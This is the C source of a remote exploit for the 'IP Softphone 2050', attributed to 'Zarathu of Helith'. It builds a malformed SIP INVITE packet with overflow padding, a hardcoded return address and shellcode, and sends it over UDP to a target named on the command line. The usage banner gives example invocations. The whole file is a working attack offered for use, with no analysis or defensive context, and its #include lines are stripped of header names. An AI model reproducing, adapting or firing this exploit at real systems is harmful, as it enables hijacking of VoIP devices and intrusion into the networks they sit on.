#include #include #include #include #include #include #include #include #define BUFSIZE 8192 char packet[BUFSIZE]; char shellcode[] = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x31\xD2\x52\x52\x52\x52\xB8\x8A\x05\x45\x7E\xFF\xD0"; void usage() { printf("----------------------------------\n"); printf("IP Softphone 2050 Exploit - by Zarathu of Helith, found ~2006\n"); printf("Greetings go out to Helith\n"); printf("usage: ./xpl1 [ default:5060]\n"); printf("e.g.\n\n"); printf("./xpl 6005 10.0.0.202 10.0.0.121 5060\n"); printf("----------------------------------\n"); } void pkcat(const char* stuff) { strcat(packet, stuff); } int main(int argc, char* argv[]) { printf("\n"); if(argc < 3) { usage(); exit(1); } int sockfd, portno, n; int serverlen, i; struct sockaddr_in serveraddr; struct hostent *server; bzero(packet, sizeof(packet)); memset(packet, 'A', 42); *(int *) (packet + 42) = 0x7C8369D8; memcpy(packet + 46, shellcode, sizeof(shellcode)); char* num; num = argv[1]; char* des; des = argv[2]; char* svr; svr = argv[3]; if(!argv[4]) { portno = 5060; } else { portno = atoi(argv[4]); } printf("[+] - Constructing malicious packet\n\n"); pkcat(" sip:"); pkcat(num); pkcat("@"); pkcat(des); pkcat(" SIP/2.0\r\n"); pkcat( "Via: SIP/2.0/UDP 10.0.0.999:5060;branch=z9hG4bK000050\r\n" "From: 5 ;tag=5\r\n"); pkcat("To: Receiver \r\n" "Call-ID: 0@localhost\r\n" "CSeq: 1 INVITE\r\n" "Contact: 5 " "Expires: 1200\r\n" "Max-Forwards: 70\r\n" "Content-Type: application/sdp\r\n" "Content-Length: 128\r\n" "\r\n" "v=0\r\n" "o=5 5 5 IN IP4 localhost\r\n" "s=Session SDP\r\n" "c=IN IP4 127.0.0.1\r\n" "t=0 0\r\n" "m=audio 9876 RTP/AVP 0\r\n" "a=rtpmap:0 PCMU/8000"); printf("[+] - Opening socket\n\n"); sockfd = socket(AF_INET, SOCK_DGRAM, 0); if(sockfd < 0) { printf("[+] - Error opening socket\n"); exit(1); } if((server = gethostbyname(des)) == NULL) { printf("[+] - Error resolving host, greetings \n"); exit(1); } else { printf("[+] - Connecting...\n"); } bzero((char *) &serveraddr, sizeof(serveraddr)); serveraddr.sin_family = AF_INET; bcopy((char *)server->h_addr, (char *)&serveraddr.sin_addr.s_addr, server->h_length); serveraddr.sin_port = htons(portno); serverlen = sizeof(serveraddr); printf("done\n\n"); if (sendto(sockfd, packet, strlen(packet), 0, \ (const struct sockaddr*)&serveraddr, serverlen) < 0) { perror("[+] - sendto Error"); exit(1); } printf("[+] - Exploit sent!\n\n"); return (0); }